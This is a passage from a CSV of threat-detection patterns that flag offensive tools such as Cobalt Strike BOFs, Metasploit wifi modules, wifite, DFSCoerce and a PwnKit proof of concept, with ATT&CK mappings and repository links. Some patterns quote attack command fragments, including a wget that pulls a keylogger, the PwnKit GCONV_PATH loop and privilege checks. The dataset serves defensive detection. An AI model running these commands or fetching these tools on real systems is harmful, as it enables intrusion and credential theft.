(CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wget* -O les.sh*",".{0,1000}wget.{0,1000}\s\-O\sles\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*",".{0,1000}wget.{0,1000}\/drapl0n\/DuckyLogger\/blob\/main\/xinput\\\?raw\=true.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*Wh04m1001/DFSCoerce*",".{0,1000}Wh04m1001\/DFSCoerce.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","687","90","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*wh0amitz/BypassCredGuard*",".{0,1000}wh0amitz\/BypassCredGuard.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*wh0amitz/PetitPotato*",".{0,1000}wh0amitz\/PetitPotato.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*wh0amitz/S4UTomato*",".{0,1000}wh0amitz\/S4UTomato.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*wh0amitz/SharpADWS*",".{0,1000}wh0amitz\/SharpADWS.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 
- T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*Wh1t3Fox/polenum*",".{0,1000}Wh1t3Fox\/polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WhatBreach*",".{0,1000}WhatBreach.{0,1000}","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. 
To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","1059","159","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z" "*whatlicense-main.zip*",".{0,1000}whatlicense\-main\.zip.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*whereami.cna*",".{0,1000}whereami\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*whereami.x64*",".{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*WheresMyImplant.cs*",".{0,1000}WheresMyImplant\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" 
"*WheresMyImplant.git*",".{0,1000}WheresMyImplant\.git.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*WheresMyImplant.sln*",".{0,1000}WheresMyImplant\.sln.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*while * do mv *GCONV_PATH=./value* done",".{0,1000}while\s.{0,1000}\sdo\smv\s.{0,1000}GCONV_PATH\=\.\/value.{0,1000}\sdone","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034 ","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*Whirlpool-Orig-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Orig\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Whirlpool-Tweak-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Tweak\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Whisker.DSInternals*",".{0,1000}Whisker\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Whisker.exe*",".{0,1000}Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*whiskeysaml.py*",".{0,1000}whiskeysaml\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*whiskeysamlandfriends*",".{0,1000}whiskeysamlandfriends.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*",".{0,1000}whoami\s\/priv\s\|\sfindstr\s\/i\s\/C\:.{0,1000}SeImpersonatePrivilege.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*whoami /user*",".{0,1000}whoami\s\/user.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - 
TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*whoami.nim*",".{0,1000}whoami\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*whoami.py*",".{0,1000}whoami\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*WhoamiGetTokenInfo*",".{0,1000}WhoamiGetTokenInfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*wifi/airpwn*",".{0,1000}wifi\/airpwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wifi/dnspwn*",".{0,1000}wifi\/dnspwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wifi_dos_own.py*",".{0,1000}wifi_dos_own\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*wifi_dos3.py*",".{0,1000}wifi_dos3\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*wifi_dump_linux*",".{0,1000}wifi_dump_linux.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*wifi_fake_auth.*",".{0,1000}wifi_fake_auth\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*WiFi_Hacker.ino*",".{0,1000}WiFi_Hacker\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*wifi_pineapple_csrf*",".{0,1000}wifi_pineapple_csrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*wifi_recon_handshakes*",".{0,1000}wifi_recon_handshakes.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*wifi-arsenal*",".{0,1000}wifi\-arsenal.{0,1000}","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1806","399","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" "*wifibroot.py*",".{0,1000}wifibroot\.py.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","10","923","178","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" "*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1185","313","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" "*wifi-bruteforcer*",".{0,1000}wifi\-bruteforcer.{0,1000}","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1185","313","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" "*wifidump.cna*",".{0,1000}wifidump\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*wifijammer*",".{0,1000}wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3880","779","2024-02-09T16:04:36Z","2014-01-26T07:54:39Z" "*WifiPasswords.ps1*",".{0,1000}WifiPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*wifiphisher*",".{0,1000}wifiphisher.{0,1000}","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12711","2564","2023-12-17T02:00:16Z","2014-09-26T12:47:28Z" "*WiFi-Pumpkin*",".{0,1000}WiFi\-Pumpkin.{0,1000}","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","10","3071","716","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z" "*wifite --crack*",".{0,1000}wifite\s\-\-crack.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*wifite --dict *.txt*",".{0,1000}wifite\s\-\-dict\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wifite -e *",".{0,1000}wifite\s\-e\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*wifite --kill*",".{0,1000}wifite\s\-\-kill.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wifite --wep *",".{0,1000}wifite\s\-\-wep\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*Wifite.py*",".{0,1000}Wifite\.py.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5989","1241","2024-04-27T01:14:44Z","2015-05-30T06:09:52Z" "*wifite2.git*",".{0,1000}wifite2\.git.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. 
